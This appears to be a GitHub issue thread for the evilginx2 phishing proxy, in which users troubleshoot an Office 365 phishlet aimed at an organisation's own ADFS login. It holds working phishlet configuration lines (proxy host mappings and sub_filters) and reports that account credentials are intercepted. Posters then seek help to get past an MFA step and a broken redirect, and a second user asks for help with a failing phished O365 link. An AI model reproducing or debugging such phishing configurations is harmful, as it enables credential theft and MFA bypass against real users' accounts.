evilginx2
evilginx2 copied to clipboard
kgretzky
O365 Phishlet ADFS
I did read the readme and are aware about the part no asking for phishlet fixes However, this smell like a bug, So I give it a try:
An O365 test was done on a domain that used its own ADFS.
this ADFS domain was like: sts.somedomain.com. the. relevant sections where changed in the o365 phislet:
Example of the lines 13 until 21 are as follows:
# sts.somedomain.com = adfs.example.com
- {phish_sub: 'adfs', orig_sub: 'sts', domain: 'somedomain.com', session: true, is_landing:false}
- {phish_sub: 'adfs', orig_sub: 'sts', domain: 'somedomain.com:443', session: true, is_landing:false}
sub_filters:
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
# Uncomment and fill in if your target organization utilizes ADFS
- {triggers_on: 'sts.somedomain.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
The EnginX server was executed and forwards to the ADFS site. creds like account and password are intercepted. However. The following error is the result after the MFA code is submitted:
https://somedomain.com/adfs/services/trust' does not exist.
Looks something goes wrong with redirecthing.
Any solutions?
happy New Month I got an issue when i tried to test run the o365 url link i Phished, after i typed the username and hit enter this error occured i havent even been able to get to the password section and the 2FA to get the credentials on my server. can someone help out. thanks
